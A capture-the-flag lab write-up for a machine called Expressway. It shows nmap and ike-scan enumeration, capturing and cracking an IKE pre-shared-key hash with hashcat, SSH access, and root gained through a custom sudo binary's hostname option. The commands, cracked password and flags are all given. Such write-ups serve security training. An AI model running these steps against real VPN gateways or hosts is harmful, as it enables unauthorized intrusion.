Expressway

10.129.238.52

Enumeration

NMAP

nmap -sC -sV -T4 10.129.238.52
nmap -p- -sC -sV 10.129.238.52

22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -A -sU --top-port 100 10.129.238.52

68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
500/udp  open          isakmp?
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0
| fingerprint-strings: 
|   IKE_MAIN_MODE: 
|_    "3DUfw
4500/udp open|filtered nat-t-ike
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.94SVN%I=7%D=1/11%Time=69645C2A%P=x86_64-pc-linux-gnu%r(
SF:IKE_MAIN_MODE,70,"\0\x11\"3DUfw\x87=\x10\x87\xe0\x8ab\x0b\x01\x10\x02\0
SF:\0\0\0\0\0\0\0p\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\
SF:0\x20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x
SF:01\x80\x0b\0\x01\x80\x0c\0\x01\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\0\0\0
SF:\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0")%r(IPSEC_START,
SF:9C,"1'\xfc\xb08\x10\x9e\x89\r#\xf6\xa2\x13\xe1=\x01\x01\x10\x02\0\0\0\0
SF:\0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x
SF:20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x03\
SF:x80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\
SF:x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\x
SF:d5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\
SF:x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

ISAKMP (500) IPSec VPN

sudo ike-scan -M 10.129.238.52

10.129.238.52	Main Mode Handshake returned
	HDR=(CKY-R=c1e38d873424211f)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 
	Auth=PSK LifeType=Seconds LifeDuration=28800)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
  • Trying more aggressive scan
sudo ike-scan -A 10.129.238.52

10.129.238.52	Aggressive Mode Handshake returned HDR=(CKY-R=7ed1b0fbbe63f18b) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
  • Capturing 20 byte hash
sudo ike-scan -M -A 10.129.238.52 -n ike@expressway.htb --pskcrack=hash.txt

10.129.238.52	Aggressive Mode Handshake returned
	HDR=(CKY-R=80c8a3c8784ae941)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 
	Auth=PSK LifeType=Seconds LifeDuration=28800)
	KeyExchange(128 bytes)
	Nonce(32 bytes)
	ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
	Hash(20 bytes)
cat hash.txt
ca4ee2a7e7a9bf0259e2b7af895d41ac97457e468dd2fd0454107e128c4178475e86a548925e2ab9a65096b055f12dcae0c8e5f1f0d4fc664a874144b0393d653013b20ba67a55c6f2a5f5f993fca66ec04a5a5cb0dcfd8850ed0bcb5f56202b5388e62413695676535b16a50e1ed2085c0aa99637f00a3e4fde1f05a96de4b3:d88380a8fc39bb97f7ea923d928d18379981eaccc33057e4b5cb34248e9ddd337e4b277431cf4aceb549d6da09b3ba2733cafa4ed044789500528269aef0d724b3b1d2bd5345879592979e50e1cf38e06ebc7adeb52e55ba678fcbd5313ca090cd827266aaf36366de43ea1af67c3c303966eda7d54604fa35b0b6c4241b52a1:80c8a3c8784ae941:58519064f618ccee:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:7847c92b632c1ea97985b77b79b4ffba4b59d389:597bafe713191c55d5274f3e4d78f3e19ecbdc1564b027d378e947548d8a06df:bb2f55dc075a94dcf45bc22cf2f09bb8045abd11
  • Cracking Hash
hashcat hash.txt /usr/share/wordlists/rockyou.txt

freakingrockstarontheroad

Logging in as Ike

ike@expressway:~$ cat user.txt
da91dd9f50bd7e6b96901cfc7fd0c76a
  • Transferring LinPeas 
scp linpeas.sh  ike@10.129.238.52:/home/ike
  • No Findings from LinPeas

Escalating Privileges

ike@expressway:/etc/init.d$ sudo -l
Password: 
Sorry, user ike may not run sudo on expressway.
ike@expressway:/etc/init.d$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)

This is a non standard message, not the usual Not part of sudoers 

which sudo

/usr/local/bin/sudo
  • Displays custom path instead of expected /usr/bin/sudo
  • Checking Squid logs from Proxy group
cd /var/log/squid
cat access.log.1
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
  • Finding an internal host name offramp.expressway.htb
  • Sudo has -h (Host) property which can enforce a hostname-based policy
/usr/local/bin/sudo -h offramp.expressway.htb -i

root@expressway:~# cat root.txt
cb358c6354ac5fc6bb37f5eefca5ec2c